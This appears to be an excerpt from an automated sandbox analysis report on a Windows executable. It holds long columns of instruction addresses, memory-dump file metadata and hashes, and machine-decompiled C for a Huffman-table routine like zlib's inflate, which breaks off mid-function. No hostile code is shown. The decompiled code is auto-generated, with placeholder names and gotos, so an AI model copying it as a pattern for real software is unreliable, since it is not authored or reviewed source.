                                                          0x00406e0e
                                                          0x00406e11
                                                          0x00406e14
                                                          0x00406e18
                                                          0x00406e1b
                                                          0x00406e1d
                                                          0x00406e20
                                                          0x00406e22
                                                          0x00406e36
                                                          0x00406e36
                                                          0x00406e39
                                                          0x00406e53
                                                          0x00406e53
                                                          0x00406e56
                                                          0x00000000
                                                          0x00000000
                                                          0x00406e5c
                                                          0x00406e5c
                                                          0x00406e5f
                                                          0x00000000
                                                          0x00000000
                                                          0x00406e65
                                                          0x00406e65
                                                          0x00000000
                                                          0x00406e65
                                                          0x00406e3b
                                                          0x00406e3e
                                                          0x00406e45
                                                          0x00406e48
                                                          0x00000000
                                                          0x00406e48
                                                          0x00406e24
                                                          0x00406e28
                                                          0x00406e2b
                                                          0x00000000
                                                          0x00000000
                                                          0x00406e70
                                                          0x00406e70
                                                          0x00406e95
                                                          0x00406e95
                                                          0x00406e95
                                                          0x00406e97
                                                          0x00000000
                                                          0x00000000
                                                          0x00406e75
                                                          0x00406e75
                                                          0x00406e79
                                                          0x00000000
                                                          0x00000000
                                                          0x00406e7f
                                                          0x00406e7f
                                                          0x00406e82
                                                          0x00406e85
                                                          0x00406e88
                                                          0x00406e8a
                                                          0x00406e8c
                                                          0x00406e8f
                                                          0x00406e92
                                                          0x00406e92
                                                          0x00406e92
                                                          0x00406e99
                                                          0x00406ea1
                                                          0x00406ea4
                                                          0x00406ea7
                                                          0x00406ea9
                                                          0x00406eac
                                                          0x00406eac
                                                          0x00406eae
                                                          0x00406eb2
                                                          0x00406eb5
                                                          0x00406eb8
                                                          0x00406ebb
                                                          0x00000000
                                                          0x00000000
                                                          0x00406ec1
                                                          0x00406ec1
                                                          0x00406ee6
                                                          0x00406ee6
                                                          0x00406ee6
                                                          0x00406ee8
                                                          0x00000000
                                                          0x00000000
                                                          0x00406ec6
                                                          0x00406ec6
                                                          0x00406eca
                                                          0x00000000
                                                          0x00000000
                                                          0x00406ed0
                                                          0x00406ed0
                                                          0x00406ed3
                                                          0x00406ed6
                                                          0x00406ed9
                                                          0x00406edb
                                                          0x00406edd
                                                          0x00406ee0
                                                          0x00406ee3
                                                          0x00406ee3
                                                          0x00406ee3
                                                          0x00406eea
                                                          0x00406eea
                                                          0x00406ef2
                                                          0x00406ef5
                                                          0x00406ef8
                                                          0x00406efb
                                                          0x00406eff
                                                          0x00406f02
                                                          0x00406f04
                                                          0x00406f07
                                                          0x00406f0a
                                                          0x00406f24
                                                          0x00406f24
                                                          0x00406f27
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f2d
                                                          0x00406f2d
                                                          0x00406f30
                                                          0x00406f37
                                                          0x00000000
                                                          0x00406f37
                                                          0x00406f0c
                                                          0x00406f0f
                                                          0x00406f16
                                                          0x00406f19
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f3f
                                                          0x00406f3f
                                                          0x00406f64
                                                          0x00406f64
                                                          0x00406f64
                                                          0x00406f66
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f44
                                                          0x00406f44
                                                          0x00406f48
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f4e
                                                          0x00406f4e
                                                          0x00406f51
                                                          0x00406f54
                                                          0x00406f57
                                                          0x00406f59
                                                          0x00406f5b
                                                          0x00406f5e
                                                          0x00406f61
                                                          0x00406f61
                                                          0x00406f61
                                                          0x00406f68
                                                          0x00406f70
                                                          0x00406f73
                                                          0x00406f76
                                                          0x00406f78
                                                          0x00406f7b
                                                          0x00406f7b
                                                          0x00406f7d
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f83
                                                          0x00406f83
                                                          0x00406f86
                                                          0x00406f8b
                                                          0x00406f8d
                                                          0x00406f93
                                                          0x00406f95
                                                          0x00406faa
                                                          0x00406fac
                                                          0x00406fac
                                                          0x00406f97
                                                          0x00406f9d
                                                          0x00406f9f
                                                          0x00406fa1
                                                          0x00406fa1
                                                          0x00406fae
                                                          0x00406fb2
                                                          0x00406fb5
                                                          0x00406fbb
                                                          0x00406fbb
                                                          0x00406fbe
                                                          0x00406fbe
                                                          0x00406fbe
                                                          0x00406fc0
                                                          0x00000000
                                                          0x00000000
                                                          0x00406fc6
                                                          0x00406fc6
                                                          0x00406fcc
                                                          0x00406fce
                                                          0x00406ff3
                                                          0x00406ff6
                                                          0x00406ffc
                                                          0x00407001
                                                          0x00407007
                                                          0x0040700d
                                                          0x0040700f
                                                          0x00407012
                                                          0x0040701b
                                                          0x00407021
                                                          0x00407021
                                                          0x00407014
                                                          0x00407016
                                                          0x00407018
                                                          0x00407018
                                                          0x00407023
                                                          0x00407029
                                                          0x0040702b
                                                          0x0040702e
                                                          0x00407030
                                                          0x00407036
                                                          0x00407038
                                                          0x0040703a
                                                          0x0040703c
                                                          0x0040703e
                                                          0x00407041
                                                          0x0040704a
                                                          0x0040704d
                                                          0x0040704d
                                                          0x00407043
                                                          0x00407043
                                                          0x00407046
                                                          0x00407046
                                                          0x00407041
                                                          0x00407038
                                                          0x0040704f
                                                          0x00407051
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00407051
                                                          0x00406fd0
                                                          0x00406fd0
                                                          0x00406fd6
                                                          0x00406fdc
                                                          0x00406fde
                                                          0x00000000
                                                          0x00000000
                                                          0x00406fe0
                                                          0x00406fe0
                                                          0x00406fe2
                                                          0x00406fe4
                                                          0x00406fed
                                                          0x00406fed
                                                          0x00406fe6
                                                          0x00406fe6
                                                          0x00406fe9
                                                          0x00406fe9
                                                          0x00406fef
                                                          0x00406ff1
                                                          0x00000000
                                                          0x00000000
                                                          0x00407057
                                                          0x00407057
                                                          0x0040705c
                                                          0x0040705e
                                                          0x0040705f
                                                          0x00407060
                                                          0x00407061
                                                          0x00407067
                                                          0x0040706a
                                                          0x0040706d
                                                          0x00407070
                                                          0x00407072
                                                          0x00407078
                                                          0x00407078
                                                          0x0040707b
                                                          0x0040707b
                                                          0x0040707b
                                                          0x0040707b
                                                          0x00407084
                                                          0x00000000
                                                          0x00000000
                                                          0x00407089
                                                          0x00407089
                                                          0x0040708c
                                                          0x0040708f
                                                          0x00407091
                                                          0x00407128
                                                          0x00407128
                                                          0x0040712b
                                                          0x0040712d
                                                          0x0040712e
                                                          0x0040712f
                                                          0x00407132
                                                          0x00000000
                                                          0x00407132
                                                          0x00407097
                                                          0x00407097
                                                          0x0040709d
                                                          0x0040709f
                                                          0x004070c4
                                                          0x004070c7
                                                          0x004070cd
                                                          0x004070d2
                                                          0x004070d8
                                                          0x004070de
                                                          0x004070e0
                                                          0x004070e3
                                                          0x004070ec
                                                          0x004070f2
                                                          0x004070f2
                                                          0x004070e5
                                                          0x004070e7
                                                          0x004070e9
                                                          0x004070e9
                                                          0x004070f4
                                                          0x004070fa
                                                          0x004070fc
                                                          0x004070ff
                                                          0x00407101
                                                          0x00407107
                                                          0x00407109
                                                          0x0040710b
                                                          0x0040710d
                                                          0x0040710f
                                                          0x00407112
                                                          0x0040711b
                                                          0x0040711e
                                                          0x0040711e
                                                          0x00407114
                                                          0x00407114
                                                          0x00407117
                                                          0x00407117
                                                          0x00407112
                                                          0x00407109
                                                          0x00407120
                                                          0x00407122
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00407122
                                                          0x004070a1
                                                          0x004070a1
                                                          0x004070a7
                                                          0x004070ad
                                                          0x004070af
                                                          0x00000000
                                                          0x00000000
                                                          0x004070b1
                                                          0x004070b1
                                                          0x004070b3
                                                          0x004070b5
                                                          0x004070bc
                                                          0x004070bc
                                                          0x004070be
                                                          0x004070b7
                                                          0x004070b7
                                                          0x004070b9
                                                          0x004070b9
                                                          0x004070c0
                                                          0x004070c2
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040713a
                                                          0x0040713a
                                                          0x0040713d
                                                          0x0040713f
                                                          0x00407142
                                                          0x00407145
                                                          0x00407145
                                                          0x00407145
                                                          0x00407145
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004067f3
                                                          0x004067d7
                                                          0x00000000
                                                          0x004067dd
                                                          0x004067e0
                                                          0x004067ea
                                                          0x004067ed
                                                          0x004067f0
                                                          0x00000000
                                                          0x004067f0
                                                          0x004067d7
                                                          0x004067fb
                                                          0x004067fe
                                                          0x00406802
                                                          0x0040680c
                                                          0x00406816
                                                          0x00406819
                                                          0x0040681f
                                                          0x00406953
                                                          0x00406955
                                                          0x0040695b
                                                          0x0040695e
                                                          0x00406961
                                                          0x00000000
                                                          0x00406961
                                                          0x00406825
                                                          0x00406825
                                                          0x00406826
                                                          0x0040687e
                                                          0x0040687e
                                                          0x00406885
                                                          0x0040692b
                                                          0x0040692b
                                                          0x00406930
                                                          0x00406933
                                                          0x00406938
                                                          0x0040693b
                                                          0x00406940
                                                          0x00406943
                                                          0x00406948
                                                          0x0040694b
                                                          0x0040694b
                                                          0x00000000
                                                          0x0040688b
                                                          0x0040688b
                                                          0x0040688b
                                                          0x0040688b
                                                          0x0040688f
                                                          0x0040688f
                                                          0x004068b1
                                                          0x004068b4
                                                          0x004068b6
                                                          0x004068b9
                                                          0x004068be
                                                          0x00406894
                                                          0x00406894
                                                          0x00406899
                                                          0x0040689b
                                                          0x0040689d
                                                          0x004068a2
                                                          0x004068a8
                                                          0x004068ad
                                                          0x004068af
                                                          0x004068af
                                                          0x004068a4
                                                          0x004068a4
                                                          0x004068a4
                                                          0x004068a2
                                                          0x00000000
                                                          0x004068c0
                                                          0x004068ed
                                                          0x004068f2
                                                          0x004068f4
                                                          0x004068f5
                                                          0x004068f7
                                                          0x004068f8
                                                          0x004068f8
                                                          0x004068f8
                                                          0x00406920
                                                          0x00406925
                                                          0x00406925
                                                          0x00000000
                                                          0x00406925
                                                          0x004068be
                                                          0x00406885
                                                          0x00406828
                                                          0x00406828
                                                          0x00406829
                                                          0x00406873
                                                          0x00000000
                                                          0x00406873
                                                          0x0040682b
                                                          0x0040682c
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406988
                                                          0x00406988
                                                          0x00406988
                                                          0x0040698b
                                                          0x00000000
                                                          0x00000000
                                                          0x00406968
                                                          0x00406968
                                                          0x0040696c
                                                          0x00000000
                                                          0x00000000
                                                          0x00406972
                                                          0x00406972
                                                          0x00406975
                                                          0x00406978
                                                          0x0040697d
                                                          0x0040697f
                                                          0x00406982
                                                          0x00406985
                                                          0x00406985
                                                          0x00406985
                                                          0x0040698d
                                                          0x0040698d
                                                          0x00406990
                                                          0x00406992
                                                          0x00406997
                                                          0x0040699a
                                                          0x0040699c
                                                          0x0040699f
                                                          0x00000000
                                                          0x00000000
                                                          0x004069a5
                                                          0x004069a5
                                                          0x004069a7
                                                          0x00000000
                                                          0x00000000
                                                          0x004069ad
                                                          0x004069ad
                                                          0x004069b1
                                                          0x00000000
                                                          0x00000000
                                                          0x004069b7
                                                          0x004069b7
                                                          0x004069ba
                                                          0x004069bc
                                                          0x00406a5a
                                                          0x00406a5a
                                                          0x00406a5d
                                                          0x00406a5f
                                                          0x00406a5f
                                                          0x00406a62
                                                          0x00406a65
                                                          0x00406a67
                                                          0x00406a69
                                                          0x00406a6b
                                                          0x00406a6b
                                                          0x00406a74
                                                          0x00406a79
                                                          0x00406a7c
                                                          0x00406a7f
                                                          0x00406a82
                                                          0x00406a85
                                                          0x00406a85
                                                          0x00406a85
                                                          0x00406a88
                                                          0x00406a8e
                                                          0x00406a8e
                                                          0x00406a94
                                                          0x00406a94
                                                          0x00406a94
                                                          0x00000000
                                                          0x00406a88
                                                          0x004069c2
                                                          0x004069c2
                                                          0x004069c8
                                                          0x004069cb
                                                          0x004069cd
                                                          0x004069f8
                                                          0x004069fb
                                                          0x00406a01
                                                          0x00406a06
                                                          0x00406a0c
                                                          0x00406a12
                                                          0x00406a14
                                                          0x00406a17
                                                          0x00406a20
                                                          0x00406a26
                                                          0x00406a26
                                                          0x00406a19
                                                          0x00406a1b
                                                          0x00406a1d
                                                          0x00406a1d
                                                          0x00406a28
                                                          0x00406a2e
                                                          0x00406a31
                                                          0x00406a33
                                                          0x00406a35
                                                          0x00406a3b
                                                          0x00406a3d
                                                          0x00406a3f
                                                          0x00406a42
                                                          0x00406a4b
                                                          0x00406a4b
                                                          0x00406a4d
                                                          0x00406a44
                                                          0x00406a44
                                                          0x00406a47
                                                          0x00406a47
                                                          0x00406a4f
                                                          0x00406a4f
                                                          0x00406a3d
                                                          0x00406a52
                                                          0x00406a54
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406a54
                                                          0x004069cf
                                                          0x004069cf
                                                          0x004069d5
                                                          0x004069db
                                                          0x004069dd
                                                          0x00000000
                                                          0x00000000
                                                          0x004069df
                                                          0x004069df
                                                          0x004069e1
                                                          0x004069e3
                                                          0x004069e6
                                                          0x004069ed
                                                          0x004069ed
                                                          0x004069ef
                                                          0x004069e8
                                                          0x004069e8
                                                          0x004069ea
                                                          0x004069ea
                                                          0x004069f1
                                                          0x004069f3
                                                          0x004069f6
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406afa
                                                          0x00406afd
                                                          0x00406b00
                                                          0x00406b06
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406cdd
                                                          0x00406cdd
                                                          0x00406cdd
                                                          0x00406ce0
                                                          0x00406ce3
                                                          0x00406ce5
                                                          0x00406ce8
                                                          0x00406cee
                                                          0x00406cf5
                                                          0x00406cf7
                                                          0x00000000
                                                          0x00000000
                                                          0x00406bcb
                                                          0x00406bcb
                                                          0x00406bf3
                                                          0x00406bf3
                                                          0x00406bf3
                                                          0x00406bf5
                                                          0x00000000
                                                          0x00000000
                                                          0x00406bd3
                                                          0x00406bd3
                                                          0x00406bd7
                                                          0x00000000
                                                          0x00000000
                                                          0x00406bdd
                                                          0x00406bdd
                                                          0x00406be0
                                                          0x00406be3
                                                          0x00406be6
                                                          0x00406be8
                                                          0x00406bea
                                                          0x00406bed
                                                          0x00406bf0
                                                          0x00406bf0
                                                          0x00406bf0
                                                          0x00406bf7
                                                          0x00406bf7
                                                          0x00406bff
                                                          0x00406c02
                                                          0x00406c08
                                                          0x00406c0b
                                                          0x00406c0f
                                                          0x00406c13
                                                          0x00406c16
                                                          0x00406c19
                                                          0x00406c31
                                                          0x00406c31
                                                          0x00406c34
                                                          0x00406c42
                                                          0x00406c45
                                                          0x00406c36
                                                          0x00406c36
                                                          0x00406c38
                                                          0x00406c3f
                                                          0x00406c3f
                                                          0x00406c6e
                                                          0x00406c6e
                                                          0x00406c6e
                                                          0x00406c71
                                                          0x00406c73
                                                          0x00000000
                                                          0x00000000
                                                          0x00406c4e
                                                          0x00406c4e
                                                          0x00406c52
                                                          0x00000000
                                                          0x00000000
                                                          0x00406c58
                                                          0x00406c58
                                                          0x00406c5b
                                                          0x00406c5e
                                                          0x00406c61
                                                          0x00406c63
                                                          0x00406c65
                                                          0x00406c68
                                                          0x00406c6b
                                                          0x00406c6b
                                                          0x00406c6b
                                                          0x00406c75
                                                          0x00406c75
                                                          0x00406c77
                                                          0x00406c79
                                                          0x00406c84
                                                          0x00406c87
                                                          0x00406c8a
                                                          0x00406c8c
                                                          0x00406c8e
                                                          0x00406c90
                                                          0x00406c93
                                                          0x00406c96
                                                          0x00406c9b
                                                          0x00406c9e
                                                          0x00406ca1
                                                          0x00406ca4
                                                          0x00406cab
                                                          0x00406cae
                                                          0x00406cb0
                                                          0x00000000
                                                          0x00000000
                                                          0x00406cb6
                                                          0x00406cb6
                                                          0x00406cba
                                                          0x00406ccb
                                                          0x00406ccb
                                                          0x00406ccb
                                                          0x00406ccd
                                                          0x00406ccd
                                                          0x00406cd1
                                                          0x00406cd1
                                                          0x00406cd1
                                                          0x00406cd3
                                                          0x00406cd4
                                                          0x00406cd7
                                                          0x00406cd7
                                                          0x00406cd7
                                                          0x00406cda
                                                          0x00000000
                                                          0x00406cda
                                                          0x00406cbc
                                                          0x00406cbc
                                                          0x00406cbf
                                                          0x00000000
                                                          0x00000000
                                                          0x00406cc5
                                                          0x00406cc5
                                                          0x00000000
                                                          0x00406cc5
                                                          0x00406c1b
                                                          0x00406c1b
                                                          0x00406c1d
                                                          0x00406c1f
                                                          0x00406c22
                                                          0x00406c25
                                                          0x00406c29
                                                          0x00406c29
                                                          0x00406cfd
                                                          0x00406cfd
                                                          0x00406d00
                                                          0x00406d07
                                                          0x00406d0b
                                                          0x00406d0d
                                                          0x00406d10
                                                          0x00406d13
                                                          0x00406d18
                                                          0x00406d1b
                                                          0x00406d1d
                                                          0x00406d1e
                                                          0x00406d21
                                                          0x00406d2c
                                                          0x00406d2f
                                                          0x00406d46
                                                          0x00406d4b
                                                          0x00406d52
                                                          0x00406d57
                                                          0x00406d5b
                                                          0x00406d5d
                                                          0x00406d5d
                                                          0x00406d5d
                                                          0x00406d60
                                                          0x00406d62
                                                          0x00000000
                                                          0x00406d68
                                                          0x00406d68
                                                          0x00406d6c
                                                          0x00406d77
                                                          0x00406d8a
                                                          0x00406d8f
                                                          0x00406d94
                                                          0x00406d96
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d9c
                                                          0x00406d9c
                                                          0x00406d9f
                                                          0x00406da1
                                                          0x00406daf
                                                          0x00406daf
                                                          0x00406db2
                                                          0x00406db2
                                                          0x00406db5
                                                          0x00406db8
                                                          0x00406dbb
                                                          0x00406dbe
                                                          0x00406dc1
                                                          0x00406dc4
                                                          0x00000000
                                                          0x00406dc4
                                                          0x00406da3
                                                          0x00406da3
                                                          0x00406da9
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406da9
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00407148
                                                          0x00407148
                                                          0x0040714e
                                                          0x00407154
                                                          0x00407159
                                                          0x0040715f
                                                          0x00407165
                                                          0x00407167
                                                          0x0040716a
                                                          0x00407173
                                                          0x00407179
                                                          0x00407179
                                                          0x0040716c
                                                          0x0040716e
                                                          0x00407170
                                                          0x00407170
                                                          0x0040717b
                                                          0x0040717d
                                                          0x00407180
                                                          0x004071bb
                                                          0x004071bb
                                                          0x00000000
                                                          0x00407182
                                                          0x00407182
                                                          0x00407182
                                                          0x00407188
                                                          0x0040718b
                                                          0x0040718d
                                                          0x004071c2
                                                          0x004071c4
                                                          0x00000000
                                                          0x004071c4
                                                          0x00000000
                                                          0x0040718d
                                                          0x00000000
                                                          0x004067cc
                                                          0x0040719a
                                                          0x00000000
                                                          0x0040719a
                                                          0x00406bae
                                                          0x00406bb0
                                                          0x00000000
                                                          0x00000000
                                                          0x00406bb2
                                                          0x00406bb2
                                                          0x00406bb5
                                                          0x00000000
                                                          0x00406bb5
                                                          0x00406afa
                                                          0x00406abb
                                                          0x0040719f
                                                          0x004071a2
                                                          0x004071a4
                                                          0x004071ad
                                                          0x004071b3
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.210091927.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.210082002.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210106552.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210112543.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210125931.000000000041D000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210140602.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210144999.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210150471.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4bf0dc9490cdbbc86d2a3ca7a16b52ea3cfbca706e4f0df3696eaa57b0731521
                                                          • Instruction ID: b08cd02f1fd501d3445e90baf7751cef13b22d715440c1b84896235b33eeb5ef
                                                          • Opcode Fuzzy Hash: 4bf0dc9490cdbbc86d2a3ca7a16b52ea3cfbca706e4f0df3696eaa57b0731521
                                                          • Instruction Fuzzy Hash: E3E18A71904719DFDB24CF58C890BAABBF5FB44305F15882EE497A72D1E738AA91CB04
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00407272(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
                                                          				signed int _v8;
                                                          				unsigned int _v12;
                                                          				signed int _v16;
                                                          				intOrPtr _v20;
                                                          				signed int _v24;
                                                          				signed int _v28;
                                                          				intOrPtr* _v32;
                                                          				signed int* _v36;
                                                          				signed int _v40;
                                                          				signed int _v44;
                                                          				intOrPtr _v48;
                                                          				intOrPtr _v52;
                                                          				void _v116;
                                                          				signed int _v176;
                                                          				signed int _v180;
                                                          				signed int _v240;
                                                          				signed int _t166;
                                                          				signed int _t168;
                                                          				intOrPtr _t175;
                                                          				signed int _t181;
                                                          				void* _t182;
                                                          				intOrPtr _t183;
                                                          				signed int* _t184;
                                                          				signed int _t186;
                                                          				signed int _t187;
                                                          				signed int* _t189;
                                                          				signed int _t190;
                                                          				intOrPtr* _t191;
                                                          				intOrPtr _t192;
                                                          				signed int _t193;
                                                          				signed int _t195;
                                                          				signed int _t200;
                                                          				signed int _t205;
                                                          				void* _t207;
                                                          				short _t208;
                                                          				signed char _t222;
                                                          				signed int _t224;
                                                          				signed int _t225;
                                                          				signed int* _t232;
                                                          				signed int _t233;
                                                          				signed int _t234;
                                                          				void* _t235;
                                                          				signed int _t236;
                                                          				signed int _t244;
                                                          				signed int _t246;
                                                          				signed int _t251;
                                                          				signed int _t254;
                                                          				signed int _t256;
                                                          				signed int _t259;
                                                          				signed int _t262;
                                                          				void* _t263;
                                                          				void* _t264;
                                                          				signed int _t267;
                                                          				intOrPtr _t269;
                                                          				intOrPtr _t271;
                                                          				signed int _t274;
                                                          				intOrPtr* _t275;
                                                          				unsigned int _t276;
                                                          				void* _t277;
                                                          				signed int _t278;
                                                          				intOrPtr* _t279;
                                                          				signed int _t281;
                                                          				intOrPtr _t282;
                                                          				intOrPtr _t283;
                                                          				signed int* _t284;
                                                          				signed int _t286;
                                                          				signed int _t287;
                                                          				signed int _t288;
                                                          				signed int _t296;
                                                          				signed int* _t297;
                                                          				intOrPtr _t298;
                                                          				void* _t299;
                                                          
                                                          				_t278 = _a8;
                                                          				_t187 = 0x10;
                                                          				memset( &_v116, 0, _t187 << 2);
                                                          				_t189 = _a4;
                                                          				_t233 = _t278;
                                                          				do {
                                                          					_t166 =  *_t189;
                                                          					_t189 =  &(_t189[1]);
                                                          					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
                                                          					_t233 = _t233 - 1;
                                                          				} while (_t233 != 0);
                                                          				if(_v116 != _t278) {
                                                          					_t279 = _a28;
                                                          					_t267 =  *_t279;
                                                          					_t190 = 1;
                                                          					_a28 = _t267;
                                                          					_t234 = 0xf;
                                                          					while(1) {
                                                          						_t168 = 0;
                                                          						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
                                                          							break;
                                                          						}
                                                          						_t190 = _t190 + 1;
                                                          						if(_t190 <= _t234) {
                                                          							continue;
                                                          						}
                                                          						break;
                                                          					}
                                                          					_v8 = _t190;
                                                          					if(_t267 < _t190) {
                                                          						_a28 = _t190;
                                                          					}
                                                          					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
                                                          						_t234 = _t234 - 1;
                                                          						if(_t234 != 0) {
                                                          							continue;
                                                          						}
                                                          						break;
                                                          					}
                                                          					_v28 = _t234;
                                                          					if(_a28 > _t234) {
                                                          						_a28 = _t234;
                                                          					}
                                                          					 *_t279 = _a28;
                                                          					_t181 = 1 << _t190;
                                                          					while(_t190 < _t234) {
                                                          						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
                                                          						if(_t182 < 0) {
                                                          							L64:
                                                          							return _t168 | 0xffffffff;
                                                          						}
                                                          						_t190 = _t190 + 1;
                                                          						_t181 = _t182 + _t182;
                                                          					}
                                                          					_t281 = _t234 << 2;
                                                          					_t191 = _t299 + _t281 - 0x70;
                                                          					_t269 =  *_t191;
                                                          					_t183 = _t181 - _t269;
                                                          					_v52 = _t183;
                                                          					if(_t183 < 0) {
                                                          						goto L64;
                                                          					}
                                                          					_v176 = _t168;
                                                          					 *_t191 = _t269 + _t183;
                                                          					_t192 = 0;
                                                          					_t235 = _t234 - 1;
                                                          					if(_t235 == 0) {
                                                          						L21:
                                                          						_t184 = _a4;
                                                          						_t271 = 0;
                                                          						do {
                                                          							_t193 =  *_t184;
                                                          							_t184 =  &(_t184[1]);
                                                          							if(_t193 != _t168) {
                                                          								_t232 = _t299 + _t193 * 4 - 0xb0;
                                                          								_t236 =  *_t232;
                                                          								 *((intOrPtr*)(0x42d6d0 + _t236 * 4)) = _t271;
                                                          								 *_t232 = _t236 + 1;
                                                          							}
                                                          							_t271 = _t271 + 1;
                                                          						} while (_t271 < _a8);
                                                          						_v16 = _v16 | 0xffffffff;
                                                          						_v40 = _v40 & 0x00000000;
                                                          						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
                                                          						_t195 = _v8;
                                                          						_t186 =  ~_a28;
                                                          						_v12 = _t168;
                                                          						_v180 = _t168;
                                                          						_v36 = 0x42d6d0;
                                                          						_v240 = _t168;
                                                          						if(_t195 > _v28) {
                                                          							L62:
                                                          							_t168 = 0;
                                                          							if(_v52 == 0 || _v28 == 1) {
                                                          								return _t168;
                                                          							} else {
                                                          								goto L64;
                                                          							}
                                                          						}
                                                          						_v44 = _t195 - 1;
                                                          						_v32 = _t299 + _t195 * 4 - 0x70;
                                                          						do {
                                                          							_t282 =  *_v32;
                                                          							if(_t282 == 0) {
                                                          								goto L61;
                                                          							}
                                                          							while(1) {
                                                          								_t283 = _t282 - 1;
                                                          								_t200 = _a28 + _t186;
                                                          								_v48 = _t283;
                                                          								_v24 = _t200;
                                                          								if(_v8 <= _t200) {
                                                          									goto L45;
                                                          								}
                                                          								L31:
                                                          								_v20 = _t283 + 1;
                                                          								do {
                                                          									_v16 = _v16 + 1;
                                                          									_t296 = _v28 - _v24;
                                                          									if(_t296 > _a28) {
                                                          										_t296 = _a28;
                                                          									}
                                                          									_t222 = _v8 - _v24;
                                                          									_t254 = 1 << _t222;
                                                          									if(1 <= _v20) {
                                                          										L40:
                                                          										_t256 =  *_a36;
                                                          										_t168 = 1 << _t222;
                                                          										_v40 = 1;
                                                          										_t274 = _t256 + 1;
                                                          										if(_t274 > 0x5a0) {
                                                          											goto L64;
                                                          										}
                                                          									} else {
                                                          										_t275 = _v32;
                                                          										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
                                                          										if(_t222 >= _t296) {
                                                          											goto L40;
                                                          										}
                                                          										while(1) {
                                                          											_t222 = _t222 + 1;
                                                          											if(_t222 >= _t296) {
                                                          												goto L40;
                                                          											}
                                                          											_t275 = _t275 + 4;
                                                          											_t264 = _t263 + _t263;
                                                          											_t175 =  *_t275;
                                                          											if(_t264 <= _t175) {
                                                          												goto L40;
                                                          											}
                                                          											_t263 = _t264 - _t175;
                                                          										}
                                                          										goto L40;
                                                          									}
                                                          									_t168 = _a32 + _t256 * 4;
                                                          									_t297 = _t299 + _v16 * 4 - 0xec;
                                                          									 *_a36 = _t274;
                                                          									_t259 = _v16;
                                                          									 *_t297 = _t168;
                                                          									if(_t259 == 0) {
                                                          										 *_a24 = _t168;
                                                          									} else {
                                                          										_t276 = _v12;
                                                          										_t298 =  *((intOrPtr*)(_t297 - 4));
                                                          										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
                                                          										_a5 = _a28;
                                                          										_a4 = _t222;
                                                          										_t262 = _t276 >> _t186;
                                                          										_a6 = (_t168 - _t298 >> 2) - _t262;
                                                          										 *(_t298 + _t262 * 4) = _a4;
                                                          									}
                                                          									_t224 = _v24;
                                                          									_t186 = _t224;
                                                          									_t225 = _t224 + _a28;
                                                          									_v24 = _t225;
                                                          								} while (_v8 > _t225);
                                                          								L45:
                                                          								_t284 = _v36;
                                                          								_a5 = _v8 - _t186;
                                                          								if(_t284 < 0x42d6d0 + _a8 * 4) {
                                                          									_t205 =  *_t284;
                                                          									if(_t205 >= _a12) {
                                                          										_t207 = _t205 - _a12 + _t205 - _a12;
                                                          										_v36 =  &(_v36[1]);
                                                          										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
                                                          										_t208 =  *((intOrPtr*)(_t207 + _a16));
                                                          									} else {
                                                          										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
                                                          										_t208 =  *_t284;
                                                          										_v36 =  &(_t284[1]);
                                                          									}
                                                          									_a6 = _t208;
                                                          								} else {
                                                          									_a4 = 0xc0;
                                                          								}
                                                          								_t286 = 1 << _v8 - _t186;
                                                          								_t244 = _v12 >> _t186;
                                                          								while(_t244 < _v40) {
                                                          									 *(_t168 + _t244 * 4) = _a4;
                                                          									_t244 = _t244 + _t286;
                                                          								}
                                                          								_t287 = _v12;
                                                          								_t246 = 1 << _v44;
                                                          								while((_t287 & _t246) != 0) {
                                                          									_t287 = _t287 ^ _t246;
                                                          									_t246 = _t246 >> 1;
                                                          								}
                                                          								_t288 = _t287 ^ _t246;
                                                          								_v20 = 1;
